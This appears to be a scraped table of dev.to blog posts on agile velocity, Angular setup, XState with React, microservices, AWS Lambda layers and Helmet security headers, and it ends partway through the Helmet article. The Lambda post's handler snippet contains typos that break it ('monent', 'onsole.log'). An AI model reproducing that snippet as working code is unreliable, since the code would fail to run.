id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
667,630 | Increasing Velocity the Right Way and the Wrong Way | We love agile development at Foci Solutions. One of our main offerings is to coach clients on how to... | 0 | 2023-02-23T19:37:57 | https://dev.to/focisolutions/increasing-velocity-the-right-way-and-the-wrong-way-532h | agile, productivity | We love agile development at Foci Solutions. One of our main offerings is to coach clients on how to use agile to deliver quality products to their customers. Along this journey we often get asked the question "How do we increase velocity". This question is complex and often times misunderstood.
Velocity is a metric that is critically important, and yet can be fairly arbitrary. What I mean by that is velocity is used to drive priority decisions, estimate the time a feature will take, and is used to measure the business value that a team is delivering. At the same time velocity will be different for every team, has a variance of uncertainty built into it, and can take multiple sprints for velocity to even have a use.
Its critical then to understand what velocity is and be aware of how velocity can move. [scurm.org](https://www.scrum.org/resources/blog/agile-metrics-velocity#:~:text=Velocity%20is%20an%20indication%20of,Velocity%20or%20a%20Bad%20Velocity.) describes velocity as:
>an indication of the average amount of Product Backlog turned into an Increment of product during a Sprint by a Scrum Team, tracked by the Development Team for use within the Scrum Team. There is no such thing as a Good Velocity or a Bad Velocity. Remember, it is based on relative estimations
What this means is that velocity is a number used by the development team to track how much value they are delivering to the client. What is important to take from this is that it's tracked by the development team, for the scrum team. This means that the development team has sole responsibility to how the velocity moves inside the team.
As a manager or product owner if you only care about raising velocity at any and all costs developers will achieve this in the following ways
1. Developers can begin to sand bag estimates during backlog grooming. What used to be a 2 point story is now an 8 point story.
2. Developers start to cut corners. Maybe their unit tests aren't as robust, There error handling doesn't handle as many errors, Or they don't consider edge cases as much.
3. Developers start to work longer hours, take less breaks, and eventually burn out.
All of these scenarios cause a bump in velocity, however the outcomes of these scenarios are often disastrous. By sand bagging estimates, developers stop feeling like their input matters, no extra value is actually being delivered with the increased velocity which makes the metric significantly less useful. If the developers begin to cut corners it will become hard to know when software is ready, increase the bug rate, increase technical debt, and make software more expensive to deliver. Worst of all if developers start to work longer hours then the velocity bump is truly temporary. The velocity will drop as developers stop having as much passion for the code they develop and the work slowly takes a toll on their mental state. This continues until inevitably the developer crashes and decides to look beyond the company to change jobs.
So how do we responsibly increase velocity without incurring negative side effects? We can find a great example of this inside of UPS. An optimization occurred at UPS where they recalculated all of their trucks routes to eliminate as many [left hand turns](https://www.cnn.com/2017/02/16/world/ups-trucks-no-left-turns) as possible. The effects of this decision were staggering. It's estimated that this decision saved UPS over 100 million gallons of fuel every year. This kind of decision is the true way to increase velocity, by looking into the way we deliver value and doing it differently. We need to find things that can be done to increase velocity and at the same time increase value to customers now and forever. We can do this
* Through automation
* Through process optimization
* Through planning
* Through collaboration
We can spend some velocity now to increase velocity tomorrow by working to automate work developers are doing on a regular basis. Add more automation to CI/CD pipelines so developers can spend less time completing Pull Requests. Look to automate complex deployments so that a developer doesn't need to do it. Automate complicated testing plans so the a QA team can spend their time elsewhere.
Look to the process and find ways to reduce the process burden on the peoples time. This is going to vary widely based on the process you and your team has, however burdensome processes like Change Review Boards, Approval Gates, and long drawn out testing phases are often good places to look. This doesn't mean you need to make deployments riskier, however your team may need to introduce different tools, look to automation, or think outside the box to make the process less restrictive in delivering value.
Often times agile software development is often tied to doing now and thinking as we go. Taking time to come up with a solid short term plan can help in finding blockers earlier, and ensuring that the team is on the same page.
Everyone needs to come to the table and be willing to change how they work today in order to find velocity. Product Owners, QA, Managers, and even executives should be available for these discussions. Collaboration is critical to finding the largest velocity gains.
I'm sure there are other areas in your company that velocity can be found as well. Just ensure that the change is long lasting and real. Make sure the you are gaining velocity the right way.
| blastdan |
667,972 | Did you mean: | Ever seen a message like that on google? Works more or less ok when you have a search query misprint... | 21,821 | 2021-04-16T11:00:20 | https://dev.to/sergeyie/did-you-mean-44in | Ever seen a message like that on google? Works more or less ok when you have a search query misprint or smth, but really crushes the experience about brands content. Like "Did you mean:", actually No, I didn't!
Rather often when search for small companies, brands, products google adds its "Did you mean:" with several other options. That seems really annoying for webmasters who try to build beautiful UX and [SO](https://ieffe.art.blog/2021/09/19/so/) to have as much leads as possible.
Ever wanted to remove such message? Me all the time. At least to update its primitive and catchy design. Seems the only way to do that is to convince google that users aren't mistaken and that's really what they search for and what they need. Well, a brand/query needs a bigger amount of search traffic then. Usually webmasters don't have a possibility for that, the amount of searches isn't enough anyhow. Nothing else to do then, no alternative with such an alternative.
There's an idea like to try to optimize content for the keywords that "Did you mean:" offers. At least there will be a search list picture that has more logical structure view, that includes branded content, some titles, descriptions, etc. of the words google suggests. Probably and luckily this "Did you mean:" message will then soon won't be shown. | sergeyie | |
668,247 | Entendendo melhor algumas funcionalidades antes de criar seu primeiro projeto em Angular | #angular #typescript Oi gente, tudo bem com vocês? Sou estudante de programação, atualmente fazen... | 0 | 2021-04-16T19:36:13 | https://dev.to/fegoncalves/entendendo-melhor-algumas-funcionalidades-antes-de-criar-seu-primeiro-projeto-em-angular-32d6 |
[`#angular`](https://dev.to/t/angular) [`#typescript`](https://dev.to/t/typescript)
Oi gente, tudo bem com vocês?
Sou estudante de programação, atualmente fazendo o _Bootcamp Avanade Angular Developer na Digital Innovation One_ e vim compartilhar algumas informações que foram na verdade dúvidas que surgiram ao criar meu primeiro projeto em angular (que está em andamento). Sou uma pessoa bastante curiosa, detalhista mas ao compreender melhor essas funcionalidades, vim compartilhar com vocês pois talvez, essas minhas dúvidas em algum momento já foi ou pode vir a ser a sua :question: :speech_balloon: :smiley:.
### 1. PRIMEIROS PASSOS:
##### Instalar o Node
[nodejs.org] (https://nodejs.org/en/download/)
##### Instalar o gerenciador de pacotes npm
```CMD
npm install -g npm
```
##### Instalar o Angular CLI
```CMD
npm install -g @angular/cli
```
Aqui não vou entrar muito em detalhes sobre essas informações, mas essas instalações ficam armazenadas no sistema e não no projeto, por isso serão feitas apenas uma vez. Caso já os tenha instalado, basta verificar se as versões estão atualizadas:
##### Versão do Node
```CMD
node -v
```
##### Gerenciador de Pacotes
```CMD
npm -v
```
##### Angular CLI
```CMD
ng version
```
---
### 2. CRIANDO UM NOVO PROJETO
Para criar um novo projeto utilizamos a linha de comando:
```CMD
ng new nomedoprojeto
```
E a partir daqui foi onde comecei a buscar informações para entender um pouco melhor sobre essas opções a serem escolhidas:
#### STRICT MODE
Assim que digitei a linha de comando acima, recebi a seguinte mensagem:
```CMD
C:\Fer\Projetos\Angular> ng new nomedoprojeto
? Do you want to enforce stricter type checking and stricter bundle budgets in the workspace?
This setting helps improve maintainability and catch bugs ahead of time.
For more information, see https://angular.io/strict (y/N)
```
A pergunta que ele faz é: _Se eu desejo impor uma verificação de tipo mais rígida e orçamentos de pacotes mais restritos, e que essa é uma configuração que auxilia em uma melhor manutenção e detecção de bugs com antecedência_.
**_Mas na íntegra o que exatamente significa isso?_**
Essa questão tem haver com a utilização do TypeScript no Angular. Pesquisando um pouco sobre o _strict mode_ aprendi que essa é uma das ferramentas adicionais que o Angular possui. Em se tratando desse modo uma vez habilitado, será inicializado um novo workspace com uma configuração que terá o propósito de analisar seu código.
Essa sinalização vai ativar algumas opções para o compilador TypeScript. Veja algumas delas: `strictTemplates`, `strictInjectionParameters`, `noImplicitAny`, `noImplicitThis`, entre outras.
Quando uma verificação for feita no seu código, você vai receber mensagens de erros, de uma inicialização que deve ser feita diferente ou uma adição, coisas desse tipo, mas todas essas referidas mensagens são de ajustes recomendadas pela própria equipe do TypeScript. Achei isso fantástico e no final de tudo, esse modo trata da segurança do seu projeto a fim de tornar o seu código mais simples de ler e com um risco menor de apresentar falhas.
Esse modo não vem habilitado por padrão, então se a pergunta abordada nesse tópico não aparecer pra você, ela pode ser habilitada manualmente utilizando o sinalizador `--strict`.
Bom, isso tudo é muuuuito novo pra mim e faltam ainda muitos passos pra chegar lá mas quando eu chegar, já estarei ciente do que se trata o strict mode. Conforme eu for ganhando um pouco mais de conhecimento, eu quero fazer uso dele pois a princípio eu gostei :grin:, e se bem entendi a sua proposta, esse modo traz segurança não apenas para o projeto em si, mas também para o próprio profissional.
#### ROTAS E ESTILOS
Depois da sua escolha sobre o modo estrito ele pergunta se você deseja adicionar as rotas.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto>
? Would you like to add Angular routing? (y/N)
```
Rotas são simplesmente as demais páginas que vão existir no seu projeto. Vou dar um exemplo bem básico: se a sua aplicação é sobre produtos eletrônicos, então será preciso criar rotas que irão direcionar os usuários para essas demais páginas (que serão os componentes criados) de produtos, orçamento, contato, entre outros.
Para a utilização do mesmo, basta digitar `y` e um arquivo (módulo) de rotas será adicionado a sua aplicação.
Logo em seguida você precisará escolher qual formato de estilo deseja usar, então basta navegar com a seta para cima ou para baixo, e uma vez selecionado a sua preferência basta pressionar enter para confirmar.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto>
? Which stylesheet format would you like to use? (Use arrow keys)
> CSS
SCSS [ https://sass-lang.com/documentation/syntax#scss ]
Sass [ https://sass-lang.com/documentation/syntax#the-indented-syntax ]
Less [ http://lesscss.org ]
Stylus [ https://stylus-lang.com ]
```
---
### 3. INSTALAÇÃO DO ANGULAR MATERIAL
O Angular Material é uma biblioteca de componentes baseadas no material design do Google (ex.: botões, menus, etc...) e dessa forma você não precisa criar seus conteúdos do zero, basta fazer uso desses componentes.
Para fazer a instalação você digita a linha de código
```CMD
ng add @angular/material
```
#### TEMA
Primeiro ele pede para que escolha a cor do tema que deseja utilizar. Basta descer ou subir com a seta do teclado para fazer a escolha e depois pressionar enter - pode ser personalizado através do arquivo `angular.json/styles`.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto> ng add @angular/material
Installing packages for tooling via npm.
Installed packages for tooling via npm.
? Choose a prebuilt theme name, or "custom" for a custom theme: (Use arrow keys)
> Indigo/Pink [ Preview: https://material.angular.io?theme=indigo-pink ]
Deep Purple/Amber [ Preview: https://material.angular.io?theme=deeppurple-amber ]
Pink/Blue Grey [ Preview: https://material.angular.io?theme=pink-bluegrey ]
Purple/Green [ Preview: https://material.angular.io?theme=purple-green ]
Custom
```
#### TYPOGRAPHY
Logo em seguida precisa escolher se a tipografia será global, ou seja, uma vez confirmando a fonte _Roboto_ fica sendo a fonte padrão da aplicação.
Se ativar essa opção você pode ver no arquivo index.html que será adicionado o link no cabeçalho e uma classe no body - conforme a própria documentação relata - e as mudanças do style, porém, nada impede que você faça a mudança posteriormente para outro tipo de fonte.
```CMD
? Set up global Angular Material typography styles? (y/N)
```
#### ANIMATIONS
São as animações do Angular Material. Na utilização dos componentes do Angular Material, é importante aceitar o uso das animações para que tudo funcione na normalidade.
```CMD
? Set up browser animations for Angular Material? (Y/n)
```
Respondendo a todas essas opções, a instalação se dará início e você já pode começar a visualizar a sua aplicação no navegador através da linha de comando:
```CMD
ng serve
```
Bom é isso pessoal ... eu espero que esses esclarecimentos possam te auxiliar de alguma forma e qualquer coisa deixa um comentário.
Eu também adoraria ler comentários, orientações dos mais experientes pois já que estou iniciando em programação assim como em Angular, todo feedback e ajuda serão bem vindos :blush::heart:
---
##### Algumas referências utilizadas:
###### Node
[https://nodejs.org/en/](https://nodejs.org/en/)
###### Angular CLI
[https://angular.io/cli](https://angular.io/cli)
###### Strict Mode
[https://angular.io/guide/strict-mode](https://angular.io/guide/strict-mode)
[https://indepth.dev/posts/1402/bulletproof-angular](https://indepth.dev/posts/1402/bulletproof-angular)
[https://dev.to/briwa/how-strict-is-typescript-s-strict-mode-311a](https://dev.to/briwa/how-strict-is-typescript-s-strict-mode-311a)
[https://www.youtube.com/watch?v=QkC1hjXx0dU](https://www.youtube.com/watch?v=QkC1hjXx0dU)
###### Rotas
[https://www.youtube.com/watch?v=8OHoAZ6j0Rg](https://www.youtube.com/watch?v=8OHoAZ6j0Rg)
[https://balta.io/blog/angular-rotas-guardas-navegacao](https://balta.io/blog/angular-rotas-guardas-navegacao#:~:text=O%20Angular%20nos%20fornece%20um,vou%20te%20mostrar%20neste%20artigo)
###### Angular Material
[https://material.angular.io/guide/getting-started](https://material.angular.io/guide/getting-started)
[https://www.youtube.com/watch?v=5-bkwiycFik](https://www.youtube.com/watch?v=5-bkwiycFik)
###### Angular Material - Componentes e CDK
[https://material.angular.io/components/categories](https://material.angular.io/components/categories)
[https://material.io/components](https://material.io/components)
[https://material.angular.io/cdk/categories](https://material.angular.io/cdk/categories)
###### Angular Material - Tipografia
[https://material.angular.io/guide/typography](https://material.angular.io/guide/typography)
| fegoncalves | |
668,304 | A simple terminal UI dashboard for code review | Reviews is a simple code review manager that lists the status of open pull requests across multiple o... | 0 | 2021-04-16T16:19:04 | https://dev.to/apoclyps/a-simple-terminal-ui-dashboard-for-code-review-2g76 | python, terminal, github, codereview | Reviews is a simple code review manager that lists the status of open pull requests across multiple organizations & repositories as a terminal UI dashboard.

The project was created as a way to keep on top of multiple teams creating large amounts of pull requests across several repositories by having a single up-to-date view of the pull request's approval status and age.
The initial implementation can be found over on Github at https://github.com/apoclyps/code-review-manager and can be installed from PyPI: https://pypi.org/project/reviews/
Contributions and feedback are welcome. It's in the very early stages of development and it has a long way to go but hopefully, there is enough here for others to derive some value from it being released early.
### Getting started with reviews
You can immediately start using review by installing it from PyPI and using providing the following configuration before running it.
```bash
pip install reviews
export REPOSITORY_CONFIGURATION="apoclyps/code-review-manager,apoclyps/my-dev-space"
export GITHUB_TOKEN="your-token"
reviews dashboard
``` | apoclyps |
668,810 | Day 347 : Times is Rough | liner notes: Professional : Had a really good day to head into the weekend. Had a team meeting to s... | 0 | 2021-04-16T21:19:45 | https://dev.to/dwane/day-347-times-is-rough-29np | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Had a really good day to head into the weekend. Had a team meeting to see what folks worked on during the week and if anyone needed anything. Then had a really good catch up meeting with some team members. Had a lot of laughs. Spent the rest of the day getting my new blog post submitted into the Content Management System. Got my stuff done and called it a day a couple of hours early.
- Personal : Last night, I went through a bunch of tracks for the radio show. After that, I watched an episode of "Dr. Stone". Did a little thinking about how the layout will be for my new side project. Want to keep it as simple as possible.

Started working on tomorrow's radio show right after work. Got a lot of it done. Just a few more things. When that's done, I'll probably watch "Falcon and Winter Soldier". Maybe do a rough sketch of the layout for the new project. Then maybe watch an episode of "Dr. Stone". If it's not too late, maybe I'll set up a starter project. Been watching the news, whew, times is rough and people are insane!
Have a great night and weekend!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube 7KErLvd8QSc %} | dwane |
668,836 | khaliljaan99 | I love my picture pleae friends share to your friends this photo. | 0 | 2021-04-16T22:34:36 | https://dev.to/khaliljaan99/khaliljaan99-24pl | khaliljaan99 | I love my picture pleae friends share to your friends this photo. | khaliljaan99 |
669,583 | New to web development/ working in the tech sector?
| This blog post is the first one of a series of posts that are aimed at all the aspiring web developer... | 0 | 2021-04-17T18:13:13 | https://dev.to/omarsharifgr/new-to-web-development-working-in-the-tech-sector-gg7 | news, performance, achievements, success | This blog post is the first one of a series of posts that are aimed at all the aspiring web developers out there and those who - like me - want to take a step back and provide some well-needed advice to their past selves. For this particular post, this advice takes the form of outlining something that I learned this week as part of an amazing course that I am completing with an equally amazing organisation - Code Your Future.
Simply put, my first (of many) main pieces of advice to anyone starting or entering the world of tech and web development, use Social Media as a platform where you can reach out to the huge amounts of companies and recruiters looking for people like you. Examples of some social media channels and collaboration platforms that can be useful for this are:
- Twitter
- Linked in
- Slack
- Instagram
- DEV.to
- GitHub
The main way of utilising social media is by using it to build and develop your very own personal brand and profile or (with platforms such as GitHub) to demonstrate your capabilities. Whatever you do - make it something that reflects you and allows you to stand out. An example of some features that can be added to a LinkedIn account are:
- A detailed intro that outlines what you want an employer to know:

- A detailed 'About' section that provides links to previous projects, outlines achievements and showcases YOU to the best of your ability:

Quick tip - contacting the right people is essential. Don’t be scared to jump out of your comfort zone and contact employees within a company that you want to join or just to connect and gain from their experiences.
Look out for my next post…..
| omarsharifgr |
689,338 | How I can send emails with the formatting I've done in google sheet by using app script? | Hi everyone. I'm trying to send emails with google app script by running following code in script edi... | 0 | 2021-05-06T05:23:50 | https://dev.to/ahmad786987/how-i-can-send-emails-with-the-formatting-i-ve-done-in-google-sheet-by-using-app-script-2o8j | Hi everyone. I'm trying to send emails with google app script by running following code in script editor
// This constant is written in column C for rows for which an email
// has been sent successfully.
var EMAIL_SENT = 'EMAIL_SENT';
/**
* Sends non-duplicate emails with data from the current spreadsheet.
*/
function sendEmails2() {
var sheet = SpreadsheetApp.getActiveSheet();
var startRow = 2; // First row of data to process
var numRows = 2; // Number of rows to process
// Fetch the range of cells A2:B3
var dataRange = sheet.getRange(startRow, 1, numRows, 3);
// Fetch values for each row in the Range.
var data = dataRange.getValues();
for (var i = 0; i < data.length; ++i) {
var row = data[i];
var emailAddress = row[0]; // First column
var message = row[1]; // Second column
var emailSent = row[2]; // Third column
if (emailSent !== EMAIL_SENT) { // Prevents sending duplicates
var subject = 'Sending emails from a Spreadsheet';
MailApp.sendEmail(emailAddress, subject, message);
sheet.getRange(startRow + i, 3).setValue(EMAIL_SENT);
// Make sure the cell is updated right away in case the script is interrupted
SpreadsheetApp.flush();
}
}
}
The problem which I'm facing with this code is its not show the bullet points and anchor text I've formatted in my google sheet. I'll appreciate any help regarding to solve this problem.
Have a good day! | ahmad786987 | |
692,324 | Use an XState Machine with React | XState gives you the tools to take control over the state of your UI. When you've got it under contro... | 0 | 2021-05-08T22:21:21 | https://dev.to/jbranchaud/use-an-xstate-machine-with-react-326i | react, xstate, javascript, ux | XState gives you the tools to take control over the state of your UI. When you've got it under control, you can build interfaces that provide a predictable and delightful user experience.
Let's look at how to integrate XState into a React app.
There are a bunch of well-constructed XState machines available to directly copy into your project from [XState Catalogue](https://xstate-catalogue.com/). For instance, I can interact with and then grab the [Confirmation Dialog machine](https://xstate-catalogue.com/machines/confirmation-dialog) with the 'Copy' button.

I'll then paste that machine definition into something like `confirmMachine.js`. XState is framework agnostic, so there is nothing about this machine, on its own, that has anything to do with React or Vue or Svelte or whatever. I do want to use this within a React app, so I then need to grab [`@xstate/react`](https://xstate.js.org/docs/packages/xstate-react/). XState's React "bindings" come with a `useMachine` hook.
## An Example
Here is what that will look like.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
{/* other props ... */}
/>
{/* other stuff */}
</div>
)
}
```
The `useMachine` call both interprets and starts up the machine service. This hook gives you two values as an array. The `current` value is everything about the _current_ state of the machine. The `send` is a function for dispatching transitions between machine states.
## The Current State of the Machine
With `current` I can figure out the _current_ state of the machine to determine whether or not I should be showing the dialog. `current.value` will tell me what state the machine is in.
I can also get access to any error message that comes from the machine.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
const showDialog = current.value !== "closed";
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
showDialog={showDialog}
errorMessage={current.context.errorMessage}
/>
{/* other stuff */}
</div>
)
}
```
Notice I check `current.value !== "closed"` to determine whether or not the dialog should be showing.
## Moving Between States with Send
I can now incorporate the `send` function into some handlers so that users can interact with the dialog. I'll create a handler for opening, closing, and confirming the dialog.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
const deleteAction = () => { /* ... */ };
const showDialog = current.value !== "closed";
const open = () => {
send({ type: "OPEN_DIALOG", action: deleteAction });
};
const close = () => {
send("CANCEL");
};
const confirm = () => {
send("CONFIRM");
};
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
handleConfirm={confirm}
handleClose={close}
showDialog={showDialog}
errorMessage={current.context.errorMessage}
/>
{/* other stuff */}
<button onClick={open}>Delete Something</button>
</div>
)
}
```
The `open` handler when called will transition the machine to `open.idle` using the `OPEN_DIALOG` event. It also includes an `action` which will be called if the dialog is _confirmed_. When triggered, this will cause the `showDialog` value to evaluate to true. This handler is wired up to some element outside of the dialog, in this case a button.
The `close` handler is passed to the dialog. When called this sends the `CANCEL` event to the machine. That will transition the machine back into the `closed` state. This change will cause the `showDialog` value to evaluate back to false. Any user action that should dismiss the dialog will trigger this handler.
Once the dialog is open, the user can _confirm_ the dialog's prompt by clicking a 'Confirm' button. This will call the `confirm` handler which will send the `CONFIRM` event to the machine. When the machine receives this event it will trigger the `action` given on `OPEN_DIALOG`.
## Wrapping Up
There are more details to this specific machine. Depending on whether the action's promise resolves or rejects, the machine will take a different course of action. That's an exercise for the reader or the subject of another post.
At this point, we have explored enough of XState in a React context that you can start using the two together. If you'd like you can start by interacting with and remixing [the codesandbox example I used for this post](https://codesandbox.io/s/happy-ellis-e9j6s?file=/src/App.tsx).
There are a lot of moving parts when getting started with XState, so if you have questions about what was covered here, feel free to drop me a note on [twitter](https://twitter.com/jbrancha).
_If you enjoy my writing, consider [joining my newsletter](https://crafty-builder-6996.ck.page/e169c61186)._
---
<em>Cover photo by <a href="https://unsplash.com/@ballparkbrand?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Ball Park Brand</a> on <a href="https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Unsplash</a></em> | jbranchaud |
692,895 | Yes! Use microservices and ask 'why are you like this?' afterward 😑 | TL;DR It's a good idea to use microservices for a team of three or four people that only handles one... | 0 | 2021-05-09T16:51:49 | https://gdi3d.github.io/using-microservices-experience-2021-05-09/ | microservices, codenewbie, management | > TL;DR It's a good idea to use microservices for a team of three or four people that only handles one or two microservices. Otherwise, stay away!
# Falling in love with Microservices 🥰
I started using the microservice architecture in 2015 when I had to refactory a medium-size Django app into pieces. Since then I have been using microservices for both work and personal projects non-stop.
At first glance microservices are great, it looks like you get a lot of benefits and it makes you think harder about every component of your application.
> Microservices - also known as the microservice architecture - is an architectural style that structures an application as a collection of services that are:
> Highly maintainable and testable
> Loosely coupled
> Independently deployable
> Organized around business capabilities
> Owned by a small team
>
> source: [https://microservices.io/](https://microservices.io/)
I was very happy with having my multiple repos, big docker-compose.yml files, multiples databases, stitching everything together, and watch my software work, or kind of. But that excitement went away when I had to keep everything working and updating things.
# When reality kicks in 😕
Now, after 6 years of experience, I've concluded that **microservices are not a good idea when you have a team of ten or fewer people and more than three or four microservices**.
In that scenario, your development cycle will suffer and things will become tedious and more time expensive.
The main issue is not the microservices architecture itself, but rather the number of tools, knowledge, and preparation that the team needs have to be able to work properly.
In my experience, the team that I lead experienced the following issues when dealing with microservices:
- Upgrading frameworks versions was hard because we had to do it for every microservice, build, and deploy.
- We had a few libraries that were common for all microservices. Every time we discovered a bug or decided to change something, we had to apply that change to every microservice.
- Changes are part of the product life cycle, and sometimes those changes affected more than one microservice.
- Debugging was harder because the data flow through applications.
- Individual database schema for every microservice and restricted access to them forced us to use multiple microservices to be called to obtain a dataset
- Creating and maintaining a small dump of all databases for dev and QA purposes was HARD!
Today I prefer going with the traditional monolithic architecture, but making sure that my design will allow me to switch to microservices easily.
As a conclusion, I'll (try to) get back to monolithic as a starting point and move to microservices when the team size is large enough and the correlation between team size and microservices is adequate.
Another solution is to create microservices for a small part of the application that could benefit from it.
> Fun fact: Although I say this, I did use microservices on my recent side project. Maybe I'm hooked up and need counseling 😂 | gdi3d |
692,979 | How to Share Code Between Lambda Functions | As I was getting into cloud development, and while still trying to figure out the best and fastest... | 0 | 2021-05-09T20:17:19 | https://medium.com/aws-in-plain-english/how-to-share-code-between-lambda-functions-49c656bd2ffc | ---
canonical_url: https://medium.com/aws-in-plain-english/how-to-share-code-between-lambda-functions-49c656bd2ffc
---
As I was getting into cloud development, and while still trying to figure out the best and fastest way to get my code tested and deployed, I learned about Lambda Layers.
Originally, the main satisfaction they provided was enabling me to see the Lambda code directly in the AWS Console, as they extracted away the dependencies I am using, which made my lambda code smaller as it should be. This enabled me to debug and change my own written lambda code from the console directly (Don't do this in a prod environment, it's not a good practice) - later, I learned how to better debug and test my lambda locally with the help of [SAM](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/what-is-sam.html) and sometimes [Localstack](https://github.com/localstack/localstack).
That was a side effect of the Lambda Layer usage and not the purpose. This post will go over a couple of benefits of using Layers, where we will build a lambda with a layer together.
The main goals of using layers are:
- Reducing the size of the Lambda deployment package, which makes the deployment faster
- Sharing code across multiple lambdas (e.g. packages, binaries, etc.)
For the sake of demonstrating these use cases, I will use a large JS library [momentjs](https://momentjs.com/docs/) as a dependency in my lambda (Note the docs of momentjs recommend not using it whenever possible - from their docs: `We now generally consider Moment to be a legacy project in maintenance mode. It is not dead, but it is indeed done.`).
## Create Lambda Without Layers
Our lambda will simply take a date and formats it (2021-05-09 => 09 May 2021)
- Run the following command to initialize the serverless application: `sam init` - of course, you would need to have the [SAM CLI installed](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html) on your machine. Once done, you will get prompted with a few questions. Choose NodeJS as a runtime, add a project name, and select the "Hello World" template".
- Update the template.yml to reflect the proper values - mainly changing the name from hello-world to date-formatter, deleting the "Events" property of the lambda as we are not looking to trigger it through API Gateway or other means (we'll trigger it manually), and deleting the Outputs as we're not going to need them. So the template.yml will look as follows:
```
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Description: date-formatter
Resources:
DateFormatterFunction:
Type: AWS::Serverless::Function
Properties:
CodeUri: src/
Handler: app.lambdaHandler
Runtime: nodejs12.x
FunctionName: date-formatter
```
- In the generated folders and files, change the "hello-world" folder name to be "src" to match the CodeUri added in the template.yml.
- Inside the "src" folder, run `npm i moment`
- Update the app.js file as follows:
```
const moment = require(monent);
exports.lambdaHandler = async (event, context) => {
try {
const { date } = event;
const formattedDate = moment(date).format('DD MMM YYYY');
onsole.log(formattedDate);
} catch (err) {
console.log(err);
}
};
```
* Deploy the app: `sam deploy --guided`. You will be prompted with a few questions
```
Setting default arguments for 'sam deploy'
=========================================
Stack Name [sam-app]: lambda-layer-demo
AWS Region [us-east-1]:
#Shows you resources changes to be deployed and require a 'Y' to initiate deploy
Confirm changes before deploy [y/N]:
#SAM needs permission to be able to create roles to connect to the resources in your template
Allow SAM CLI IAM role creation [Y/n]: Y
Save arguments to configuration file [Y/n]: Y
SAM configuration file [samconfig.toml]:
SAM configuration environment [default]:
```
* Open your console and test the lambda - you might have an information box under "Code source" showing "The deployment package of your Lambda function is too large to enable inline code editing. However, you can still invoke your function." - What is more important is the size of the lambda, which shows under "Code properties" - the **Package size shows 1.1 MB**. It also took 32 seconds to get that code uploaded and deployed on my fiber connection.
## Introduce a Layer to our Lambda
As per the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html#invocation-layers-cloudformation), a Lambda layer is a .zip file archive that can contain additional code or data. A layer can contain libraries, a custom runtime, data, or configuration files. Layers promote code sharing and separation of responsibilities so that you can iterate faster on writing business logic.
We will now bundle momentjs in a layer, and then we could use it within our Lambda:
- Create a new folder next to the "month-formatter" folder: `cd .. && mkdir ./layer/nodejs`
- In the layer/nodejs folder, run `npm init`, then `npm i moment` - This will initialise the npm package and installs momentjs
- Back to the template.yml file Add the following resource
```
Momentlayer:
Type: AWS::Serverless::LayerVersion
Properties:
LayerName: moment-layer-2-29-1
Description: Moment layer 2.29.1
ContentUri: ../layer
CompatibleRuntimes:
- nodejs12.x
```
* Run `sam deploy` to deploy the sam template and create the layer
* Once done, navigate to the AWS console, and look under "Layers" to find the newly created layer. Or simply, run `aws lambda list-layers` in your command line
That's awesome. Now, it's time to add the layer to our lambda.
Note that the layer has to be created under the nodejs/node_modules path according to the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) unless you'd like to specify the runtime PATH yourself. In our example, we have the node_modules under the nodejs folder, and the "ContentUri" property in the template file points to that folder.
That's awesome. Navigate to the lambda in your AWS Console, test it by passing a JSON object that has a "date" property, and verify the date is printed according to the DD Month YYYY format.
## Should we use Layers?
If we look at our lambda size, the **Package size shows 277.0 bytes** instead of 1.1MB before moving to another layer.
Assume we need to reuse that code (in our example, it's momentjs) in another lambda. We could now reference the layer-a great way to share code across lambda functions.
The usage of layers comes with a couple of disadvantages though:
- Testing the lambda becomes a bit more complex as the content of the layer is needed during the execution of the unit and integration tests.
- Usage of layers with static languages (e.g. Java, C#) as they require the dependencies alongside the application code during the compilation.
It is worth weighing the benefits of layers with the complexity they introduce to your process. Usually, a good use case would be sharing a large code base across multiple functions (our example above is not a good use case to use Layers, but just a simple way to demonstrate their usage).
I hope you liked the post and looking forward to getting your feedback.
| ahaydar | |
693,254 | Why do you need Helmet in NodeJs ? | Helmet helps you secure your Express apps by setting various HTTP headers. It's not a silver bullet,... | 0 | 2021-05-10T05:27:49 | https://dev.to/sid__/why-do-you-need-helmet-in-nodejs-h1b | node, webdev, codenewbie, javascript | > Helmet helps you secure your Express apps by setting various HTTP headers. It's not a silver bullet, but it can help!
These are the lines written on top of the npm's helmet page.
Most of you might have come across this code `app.use(helmet())` in your codebase/boilerplates. Let's dive deep into helmet today.
In simple words, Helmet adds/secures HTTP headers returned by your express app.
Most of the newbie devs tend to ignore this (secured HTTP headers).
`helmet()` is a wrapper around 15 middlewares, 11 of them are used by default with preset settings.
Let's see those 11 headers in detail:
- ##`Content-Security-Policy`
Used for mitigating XSS Attacks. Helps control what domain/subdomain, which protocol, what kind of media should talk to the server.
`helmet.contentSecurityPolicy();`
- ##`X-DNS-Prefetch-Control`
